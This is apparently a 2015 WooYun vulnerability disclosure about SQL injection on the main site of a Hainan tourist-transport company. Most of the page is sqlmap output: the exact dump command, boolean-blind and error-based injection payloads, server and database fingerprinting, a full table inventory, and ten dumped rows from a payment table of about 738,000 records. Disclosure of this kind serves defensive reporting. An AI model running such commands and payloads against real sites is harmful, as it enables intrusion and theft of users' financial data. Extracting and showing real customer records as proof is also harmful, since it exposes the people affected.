当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156615

漏洞标题:海南省旅游客运管理服务有限公司主站存在SQL注射漏洞(73万用户支付信息泄露)

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-11-29 23:28

修复时间:2016-01-17 15:26

公开时间:2016-01-17 15:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-29: 细节已通知厂商并且等待厂商处理中
2015-12-03: 厂商已经确认,细节仅向厂商公开
2015-12-13: 细节向核心白帽子及相关领域专家公开
2015-12-23: 细节向普通白帽子公开
2016-01-02: 细节向实习白帽子公开
2016-01-17: 细节向公众公开

简要描述:

海南省旅游客运管理服务有限公司主站存在SQL注射漏洞(73万用户支付信息泄露)

详细说明:

地址:http://**.**.**.**/affiche_show.aspx?strAfficheId=273

$ python sqlmap.py -u "http://**.**.**.**/affiche_show.aspx?strAfficheId=273" -p strAfficheId --technique=BE --random-agent --batch  -D TC_Database -T dbo.T_Traveler_PrePay -C User_Id,PrePay_Money,PrePay_Time,Have_Money,Action_Reason,Unit_d,Traveler_Id --dump --start 1 --stop 10


Database: TC_Database
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.T_Traveler_PrePay | 738080 |


Database: TC_Database
Table: T_Traveler_PrePay
[10 entries]
+---------+--------------+--------------------+------------+---------------+---------+-------------+
| User_Id | PrePay_Money | PrePay_Time | Have_Money | Action_Reason | Unit_Id | Traveler_Id |
+---------+--------------+--------------------+------------+---------------+---------+-------------+
| 653 | 999.90 | 12 31 2014 11:07AM | 99994.69 | %u7f34%u7eb3 | 1 | 99 |
| 227 | 9573.90 | 12 30 2011 7:01AM | 9951.88 | %u8db3%u989d | 10 | 10 |
| 299 | 4504.08 | 09 24 2009 1:56PM | 195.92 | %u8db3%u989d | 100 | 100 |
| 878 | 9944.46 | 12 31 2013 10:22PM | 9954.81 | %u8db3%u989d | 101 | 101 |
| 239 | 959.00 | 12 31 2012 5:54PM | 9962.35 | %u8db3%u989d | 102 | 102 |
| 203 | 629.16 | 09 8 2010 10:13AM | 903.23 | %u8db3%u989d | 103 | 103 |
| 592 | 7380.00 | 12 2 2009 7:42AM | 8838.92 | %u8db3%u989d | 104 | 104 |
| 920 | 960.00 | 12 31 2012 8:02AM | 9992.41 | %u8db3%u989d | 105 | 105 |
| 260 | 933.76 | 12 26 2009 10:05AM | 9550.69 | %u8db3%u989d | 106 | 106 |
| 460 | 9915.00 | 12 31 2013 12:21PM | 99952.99 | %u8db3%u989d | 107 | 107 |
+---------+--------------+--------------------+------------+---------------+---------+-------------+

漏洞证明:

---
Parameter: strAfficheId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: strAfficheId=273 AND 1912=1912
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: strAfficheId=273 AND 5608=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (5608=5608) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(113)))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user: 'saWeb'
current user is DBA: False
database management system users [2]:
[*] sa
[*] saWeb
database management system users password hashes:
[*] sa [1]:
password hash: +
[*] saWeb [1]:
password hash: +
Database: TC_Database
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.T_Traveler_PrePay | 738080 |
| dbo.T_SendCar_PrintCount | 703497 |
| dbo.T_SendCar_Buy | 217343 |
| dbo.T_SendCar_Used | 215982 |
| dbo.T_SendCar | 212441 |
| dbo.T_SendCar_TravelOrderCode | 193434 |
| dbo.T_PrintRecord | 177966 |
| dbo.T_CarSecurity_AlBan | 164821 |
| dbo.T_SendCarApply | 129367 |
| dbo.GovTravelAgency | 101049 |
| dbo.T_Log | 72340 |
| dbo.t_AcceptSendCar | 67153 |
| dbo.T_BalanceDetail | 56131 |
| dbo.T_SendCar_CancelSetting | 35378 |
| dbo.T_BalanceCarDays | 33686 |
| dbo.T_CarCompanyApply | 25339 |
| dbo.T_SendCar_UsedTem | 11697 |
| dbo.T_SendCarTem | 11697 |
| dbo.T_Guides | 11096 |
| dbo.T_DriverAssesssPaiMing | 10982 |
| dbo.T_Breach | 10102 |
| dbo.t_PosLog | 9645 |
| dbo.T_DriverMonthBalance | 8138 |
| dbo.t_SendcarDriverAssesss | 7777 |
| dbo.T_CarKongShiQianDaoDetail | 7736 |
| dbo.T_CarWorkDaysDetail | 7692 |
| dbo.T_CarWaitCity | 6701 |
| dbo.T_Perview | 6033 |
| dbo.T_SendCarPlan | 5914 |
| dbo.T_Car_SheHui | 5805 |
| dbo.t_CarSign | 5433 |
| dbo.T_Sys_Para | 5112 |
| dbo.T_StaffLogin_Log | 3994 |
| dbo.T_Driver | 3928 |
| dbo.T_Car_Stop | 3457 |
| dbo.T_Car_Roll | 3141 |
| dbo.T_Car_Tem | 2994 |
| dbo.T_Driver_Tem | 2743 |
| dbo.T_CarEmgy | 2562 |
| dbo.T_SheHuiCarSendPolicy | 1879 |
| dbo.BalanceTemp | 1841 |
| dbo.T_Answer | 1835 |
| dbo.T_Car | 1800 |
| dbo.T_notify | 1667 |
| dbo.T_Staff | 1519 |
| dbo.t_CarOwer | 1438 |
| dbo.OwnerBank | 1372 |
| dbo.T_Client | 1352 |
| dbo.A_CarPhoto | 1327 |
| dbo.T_YanZhengMa | 1116 |
| dbo.T_Staff_Notify | 986 |
| dbo.T_PerivewGP | 738 |
| dbo.T_SendCarPlanQuanXian | 694 |
| dbo.T_Seat_Price | 656 |
| dbo.T_Unit | 587 |
| dbo.T_XZ_Driver | 569 |
| dbo.T_OperateSysRunProcess_Log | 466 |
| dbo.T_Affiche | 457 |
| dbo.MSreplication_objects | 228 |
| dbo.T_Price | 192 |
| dbo.T_ElectronCachet | 161 |
| dbo.MSsnapshotdeliveryprogress | 152 |
| dbo.T_CarPH | 151 |
| dbo.TenSeatChange | 144 |
| dbo.T_BalanceCarSeries | 138 |
| dbo.A_PosFail | 134 |
| dbo.T_News | 120 |
| dbo.t_CarOwer_Tem | 117 |
| dbo.T_Function | 112 |
| dbo.T_JourneyPoint | 91 |
| dbo.T_Punish | 91 |
| dbo.tempLength | 69 |
| dbo.yjtem | 68 |
| dbo.A_baobanch | 64 |
| dbo.T_BalanceMain | 63 |
| dbo.A_GCar | 36 |
| dbo.T_AllowSendCarUnit | 34 |
| dbo.TeSeatChange | 32 |
| dbo.TeSeatChangeT | 29 |
| dbo.T_PerviewG | 23 |
| dbo.BTep | 18 |
| dbo.T_Complain | 10 |
| dbo.syncobj_0x3037394341383045 | 6 |
| dbo.T_FriendLink | 6 |
| dbo.T_BalanceSeriesRate | 4 |
| dbo.T_Peccancy | 3 |
| dbo.MSsubscription_agents | 2 |
| dbo.MSreplication_subscriptions | 1 |
| dbo.MSsubscription_properties | 1 |
| dbo.T_BusinessCompany | 1 |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 67941 |
| sys.sysmessages | 67941 |
| sys.syscolumns | 10642 |
| sys.all_parameters | 6697 |
| sys.system_parameters | 6697 |
| sys.trace_subclass_values | 4722 |
| sys.trace_event_bindings | 3958 |
| sys.all_columns | 3740 |
| sys.system_columns | 3696 |
| sys.syscomments | 2744 |
| dbo.spt_values | 2346 |
| sys.all_objects | 1747 |
| sys.sysobjects | 1747 |
| sys.system_objects | 1741 |
| sys.database_permissions | 1641 |
| sys.syspermissions | 1641 |
| sys.sysprotects | 1640 |
| sys.all_sql_modules | 1589 |
| sys.system_sql_modules | 1589 |
| sys.all_views | 284 |
| sys.system_views | 284 |
| sys.event_notification_event_types | 193 |
| sys.trace_events | 171 |
| sys.syscharsets | 114 |
| sys.allocation_units | 113 |
| sys.partitions | 102 |
| sys.system_components_surface_area_configuration | 98 |
| sys.xml_schema_facets | 97 |
| sys.xml_schema_components | 93 |
| sys.xml_schema_types | 77 |
| sys.trace_columns | 65 |
| sys.configurations | 62 |
| sys.sysconfigures | 62 |
| sys.syscurconfigs | 62 |
| sys.fulltext_document_types | 50 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 |
| INFORMATION_SCHEMA.COLUMNS | 44 |
| sys.columns | 44 |
| sys.syslanguages | 33 |
| sys.systypes | 27 |
| sys.types | 27 |
| sys.securable_classes | 21 |
| sys.trace_categories | 21 |
| INFORMATION_SCHEMA.SCHEMATA | 17 |
| sys.fulltext_languages | 17 |
| sys.schemas | 17 |
| sys.xml_schema_component_placements | 17 |
| sys.database_principals | 14 |
| sys.sysusers | 14 |
| sys.xml_schema_attributes | 14 |
| sys.database_mirroring | 12 |
| sys.database_recovery_status | 12 |
| sys.databases | 12 |
| sys.sysdatabases | 12 |
| sys.server_principals | 11 |
| sys.service_contract_message_usages | 11 |
| sys.sysindexes | 10 |
| sys.stats_columns | 9 |
| sys.server_permissions | 7 |
| sys.sql_dependencies | 7 |
| sys.sysdepends | 7 |
| sys.indexes | 6 |
| sys.objects | 6 |
| sys.stats | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| INFORMATION_SCHEMA.TABLES | 5 |
| sys.index_columns | 5 |
| sys.sysindexkeys | 5 |
| sys.tables | 5 |
| sys.endpoints | 4 |
| sys.servers | 3 |
| sys.service_queue_usages | 3 |
| sys.syssegments | 3 |
| sys.sysservers | 3 |
| sys.xml_schema_namespaces | 3 |
| sys.database_files | 2 |
| sys.login_token | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_logins | 2 |
| sys.sysfiles | 2 |
| sys.syslogins | 2 |
| sys.user_token | 2 |
| dbo.spt_monitor | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_exec_requests | 1 |
| sys.dm_exec_sessions | 1 |
| sys.filegroups | 1 |
| sys.server_role_members | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysprocesses | 1 |
| sys.tcp_endpoints | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 21979 |
| dbo.backupmediafamily | 10914 |
| dbo.backupmediaset | 10914 |
| dbo.backupset | 10914 |
| dbo.restorefile | 375 |
| dbo.restorehistory | 197 |
| dbo.restorefilegroup | 138 |
+--------------------------------------------------+---------+


Database: TC_Database
Table: T_Traveler_PrePay
[9 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| Action_Reason | varchar |
| Have_Money | numeric |
| PrePay_Money | numeric |
| PrePay_Time | datetime |
| PrePay_Type | int |
| Relation_Object | varchar |
| Traveler_Id | int |
| Unit_Id | int |
| User_Id | int |
+-----------------+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: strAfficheId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: strAfficheId=273 AND 1912=1912
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: strAfficheId=273 AND 5608=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (5608=5608) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(113)+CHAR(106)+CHAR(113)))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
Database: TC_Database
Table: T_Traveler_PrePay
[10 entries]
+---------+--------------+--------------------+------------+---------------+---------+-------------+
| User_Id | PrePay_Money | PrePay_Time | Have_Money | Action_Reason | Unit_Id | Traveler_Id |
+---------+--------------+--------------------+------------+---------------+---------+-------------+
| 653 | 999.90 | 12 31 2014 11:07AM | 99994.69 | %u7f34%u7eb3 | 1 | 99 |
| 227 | 9573.90 | 12 30 2011 7:01AM | 9951.88 | %u8db3%u989d | 10 | 10 |
| 299 | 4504.08 | 09 24 2009 1:56PM | 195.92 | %u8db3%u989d | 100 | 100 |
| 878 | 9944.46 | 12 31 2013 10:22PM | 9954.81 | %u8db3%u989d | 101 | 101 |
| 239 | 959.00 | 12 31 2012 5:54PM | 9962.35 | %u8db3%u989d | 102 | 102 |
| 203 | 629.16 | 09 8 2010 10:13AM | 903.23 | %u8db3%u989d | 103 | 103 |
| 592 | 7380.00 | 12 2 2009 7:42AM | 8838.92 | %u8db3%u989d | 104 | 104 |
| 920 | 960.00 | 12 31 2012 8:02AM | 9992.41 | %u8db3%u989d | 105 | 105 |
| 260 | 933.76 | 12 26 2009 10:05AM | 9550.69 | %u8db3%u989d | 106 | 106 |
| 460 | 9915.00 | 12 31 2013 12:21PM | 99952.99 | %u8db3%u989d | 107 | 107 |
+---------+--------------+--------------------+------------+---------------+---------+-------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-03 15:25

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给海南分中心,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评价